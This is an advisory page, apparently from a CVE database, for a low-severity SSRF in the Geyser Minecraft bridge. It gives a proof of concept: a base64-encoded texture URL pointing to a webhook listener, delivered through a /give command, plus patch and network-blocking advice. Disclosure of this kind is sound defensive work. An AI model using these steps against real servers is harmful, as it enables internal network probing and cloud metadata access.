Skip to main content

Geyser CVE-2026-42188

LOW
Server-Side Request Forgery (SSRF) (CWE-918)
2026-05-05 https://github.com/GeyserMC/Geyser GHSA-xcfg-fcr5-gw9r
2.4
CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY
2.4 LOW
AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
Required
Scope
Unchanged
Confidentiality
Low
Integrity
None
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
May 05, 2026 - 21:00 vuln.today
Analysis Generated
May 05, 2026 - 21:00 vuln.today

DescriptionGitHub Advisory

Summary

A server-side request forgery (SSRF) vulnerability exists in Geyser’s handling of Bedrock player head texture data. By supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET requests to attacker-controlled or internal endpoints. This occurs server-side, without proper URL validation, and can be triggered by a Bedrock client.

Details

Geyser allows Bedrock clients to interact with Java Edition mechanics, including the creation of custom player heads using the minecraft:profile NBT structure.

When a player head is created with a custom textures property, Geyser processes the Base64-encoded JSON value and forwards the embedded texture URL for resolution. However, the URL contained in the textures.SKIN.url field is not sufficiently validated.

PoC

  1. Setup Environment:
  • Set up a Minecraft Server (Paper/Spigot) with the latest version of Geyser installed.
  • Ensure you have a Bedrock client connected.
  1. Prepare Listener:
  • Go to webhook.site and obtain a unique URL (e.g., https://webhook.site/YOUR-UUID).
  1. Construct Payload:
  • Create a JSON payload pointing to your listener URL:

{"textures":{"SKIN":{"url":"https://webhook.site/YOUR-UUID"}}}

  • Encode this JSON string to Base64.

*(You can use a terminal command: echo -n '{"textures":{"SKIN":{"url":"..."}}}' | base64)*

  1. Execute Command:
  • Run the following command in the Bedrock Edition client:

/give @p minecraft:player_head[minecraft:profile={properties:[{name:"textures",value:"[PASTE_BASE64_HERE]"}]}]

  1. Verify:
  • Check the webhook.site dashboard.
  • You will see an HTTP GET request originating from the Minecraft Server's IP address, not the client's IP.

Impact

This vulnerability allows server-side request forgery (SSRF) from the Minecraft server to arbitrary HTTP endpoints.

Affected Parties
  • Minecraft servers running Geyser
  • Server operators exposing internal or cloud metadata endpoints
Potential Impacts
  • Internal network probing (e.g., intranet services, admin panels)
  • Cloud metadata access attempts (e.g., 169.254.169.254)
  • IP address disclosure of the Minecraft server
  • Abuse of the server as an HTTP request proxy

Although the vulnerability is blind SSRF (no response data returned to the attacker), it is still useful for:

  • Network mapping
  • Firewall bypass attempts
  • Cloud environment fingerprinting

AnalysisAI

Server-side request forgery (SSRF) in Geyser through version 2.9.2 allows authenticated attackers with operator privileges to cause the Minecraft server to issue arbitrary HTTP GET requests to internal or attacker-controlled endpoints via crafted Base64-encoded player head texture URLs in the /give command. The vulnerability enables blind SSRF attacks for network reconnaissance, cloud metadata probing, and server IP disclosure without requiring unauthenticated access. Publicly available exploit code exists demonstrating proof-of-concept via webhook.site.

Technical ContextAI

Geyser is a middleware that bridges Bedrock Edition clients to Java Edition Minecraft servers. The vulnerability exists in the player head texture processing logic, specifically within the handling of the minecraft:profile NBT structure used for custom player heads. When a player head is created with a textures property containing a Base64-encoded JSON payload, Geyser decodes and processes the textures.SKIN.url field without sufficient URL validation before issuing HTTP GET requests to fetch the texture resource. The lack of validation against private IP ranges, reserved addresses (169.254.169.254 for AWS metadata), and localhost variations enables SSRF. The root cause is insufficient input validation on user-supplied URLs prior to outbound HTTP request execution (CWE-918: Server-Side Request Forgery).

RemediationAI

Vendor-released patch available: upgrade Geyser to version 2.9.3 or later. Apply the patch by replacing the geyser-core JAR file and restarting the Minecraft server. For operators unable to patch immediately, implement input validation workarounds by using permission plugins to restrict the /give command to trusted administrators only, and disable Bedrock client access if not required for operational needs. Monitor outbound HTTP requests from the Minecraft server process using firewall rules or network monitoring tools; block requests to private IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), link-local addresses (169.254.0.0/16), and localhost (127.0.0.1). Consider restricting Bedrock client connectivity to trusted network segments or disabling NBT texture profile features if supported in future Geyser releases. See GitHub advisory at https://github.com/GeyserMC/Geyser/security/advisories/GHSA-xcfg-fcr5-gw9r for detailed patch release notes.

More in Java

View all
CVE-2012-4681 CRITICAL POC
9.8 Aug 28

Oracle Java SE 7 Update 6 and earlier contains multiple sandbox bypass vulnerabilities via the ClassFinder and forName m

CVE-2015-7450 CRITICAL POC
9.8 Jan 02

Remote code execution in IBM Sterling B2B Integrator, Sterling Integrator, and Tivoli Common Reporting allows unauthenti

CVE-2013-2465 CRITICAL POC
9.8 Jun 18

Java Runtime Environment sandbox bypass via incorrect image channel verification in 2D component allows remote unauthent

CVE-2011-3544 CRITICAL POC
9.8 Oct 19

Oracle Java SE JDK/JRE 7 and 6 Update 27 and earlier allows remote code execution with complete system compromise throug

CVE-2010-1871 HIGH POC
8.8 Aug 05

JBoss Seam 2 in Red Hat JBoss EAP 4.3.0 fails to sanitize JBoss Expression Language inputs, allowing remote attackers to

CVE-2012-1723 CRITICAL POC
9.8 Jun 16

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 up

CVE-2013-0422 CRITICAL POC
9.8 Jan 10

Multiple vulnerabilities in Oracle Java 7 before Update 11 allow remote attackers to execute arbitrary code by (1) using

CVE-2012-0507 CRITICAL POC
9.8 Jun 07

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Up

CVE-2015-4852 CRITICAL POC
9.8 Nov 18

The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers

CVE-2012-5076 CRITICAL POC
9.8 Oct 16

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier allow

CVE-2017-3066 CRITICAL POC
9.8 Apr 27

Remote unauthenticated attackers can execute arbitrary code on Adobe ColdFusion servers through Java deserialization fla

CVE-2012-0391 CRITICAL POC
9.8 Jan 08

The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during

Share

CVE-2026-42188 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy